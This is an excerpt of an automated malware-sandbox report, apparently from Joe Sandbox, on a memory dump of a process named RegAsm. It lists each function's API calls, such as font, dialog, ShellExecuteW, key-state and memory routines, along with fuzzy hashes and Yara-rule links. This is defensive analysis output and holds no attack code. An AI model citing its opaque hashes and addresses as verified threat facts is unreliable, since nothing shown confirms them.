                                                                                                                                                                                                  • CreateFontIndirectW.GDI32(?), ref: 00401156
                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EC,00000030,00000000,00000000), ref: 00401175
                                                                                                                                                                                                  • SendDlgItemMessageW.USER32(?,000003EE,00000030,?,00000000), ref: 00401193
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirectmemsetwcscpy
                                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                                  • API String ID: 210187428-168460110
                                                                                                                                                                                                  • Opcode ID: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                  • Instruction ID: 44e142790c58e2983bb51e892a2c7280827b5342727586ee11fe1c2be2fb852b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0ef3d87a35f2b5fcdfef1a077cef136f9d6d3eb82dfd4d3c6e3e8344e6d66d37
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF082B5A4030877EB326BA1DC46F9A77BDBB44B01F040935F721B91D1D3F4A585C658
                                                                                                                                                                                                  Function 0041203E Relevance: 6.1, APIs: 4, Instructions: 85windowkeyboardCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • memset.MSVCRT ref: 00412057
                                                                                                                                                                                                    • Part of subcall function 0040A116: ShellExecuteW.SHELL32(?,open,?,0044E518,0044E518,00000005), ref: 0040A12C
                                                                                                                                                                                                  • SendMessageW.USER32(00000000,00000423,00000000,00000000), ref: 004120C7
                                                                                                                                                                                                  • GetMenuStringW.USER32(?,00000103,?,0000004F,00000000), ref: 004120E1
                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 0041210D
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ExecuteMenuMessageSendShellStateStringmemset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3550944819-0
                                                                                                                                                                                                  • Opcode ID: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
                                                                                                                                                                                                  • Instruction ID: b13963ca7945f00a157482356cff4617054a50a9c2c324265242a4647e6472cc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d3ffb25d57d7eacc3d24d239ecad9e19809d89229f260d5da6b5100bcdd99181
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7531D230600300DBDB20DF15CD89BDA37B5BB40314F00817AEA689B2E2D7B99ED1CB18
                                                                                                                                                                                                  Function 0040B1D1 Relevance: 5.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • wcslen.MSVCRT ref: 0040B1DE
                                                                                                                                                                                                  • free.MSVCRT ref: 0040B201
                                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                  • free.MSVCRT ref: 0040B224
                                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,-00000002,00000000,00000000,?,?,?,?,0040B319,0040B432,00000000,?,?,0040B432,00000000), ref: 0040B248
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$memcpy$mallocwcslen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 726966127-0
                                                                                                                                                                                                  • Opcode ID: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                                                                                  • Instruction ID: 71128cbd9221161776fa816c6212d75478d488e0bdd8d9cf72ea7cd81dda7be0
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3fbb0c8c7c7e4ea4d8d3f9a957d1a1ca0f5bc9a66927b7414586bca7b56f5ab2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 02215BB2500604EFD720DF18D881CAAB7F9EF49324B114A6EE452976A1CB35B9158B98
                                                                                                                                                                                                  Function 0040B0D1 Relevance: 5.1, APIs: 4, Instructions: 55stringCOMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • strlen.MSVCRT ref: 0040B0D8
                                                                                                                                                                                                  • free.MSVCRT ref: 0040B0FB
                                                                                                                                                                                                    • Part of subcall function 004099F4: malloc.MSVCRT ref: 00409A10
                                                                                                                                                                                                    • Part of subcall function 004099F4: memcpy.MSVCRT(00000000,?,?,?,?,004027EB,00000004,?,?,?,00401F8F,00000000), ref: 00409A28
                                                                                                                                                                                                    • Part of subcall function 004099F4: free.MSVCRT ref: 00409A31
                                                                                                                                                                                                  • free.MSVCRT ref: 0040B12C
                                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000000,00000000,0040B35A,?), ref: 0040B159
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: free$memcpy$mallocstrlen
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3669619086-0
                                                                                                                                                                                                  • Opcode ID: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                                                                                  • Instruction ID: 61abf4b4d63bdfee40e3433ef4540d9b033b11d4199be086b3082c0bee804e2f
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8a001e82ca3730f1e98eedeca7a3bb7ead531333626601bff92a244b64e8cf14
                                                                                                                                                                                                  • Instruction Fuzzy Hash: CA113A712042019FD711DB98FC499267B66EB8733AB25833BF4045A2A3CBB99834865F
                                                                                                                                                                                                  Function 0040D092 Relevance: 5.1, APIs: 4, Instructions: 51COMMON
                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000010.00000002.463501140.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_16_2_400000_RegAsm.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: ??2@
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1033339047-0
                                                                                                                                                                                                  • Opcode ID: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                  • Instruction ID: 5f4fc1bc6a90e200713bb7744dd8ab6a017b0cf4e98027731d5581fdeff4b0c3
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6589a97820dd4164dbe9b7b561e5d9da651562f836a554c3bd3b183484c6dcee
                                                                                                                                                                                                  • Instruction Fuzzy Hash: B00121B2A413005EEB7ADF38EE5772966A0AF4C351F01453EA246CD1F6EEF58480CB49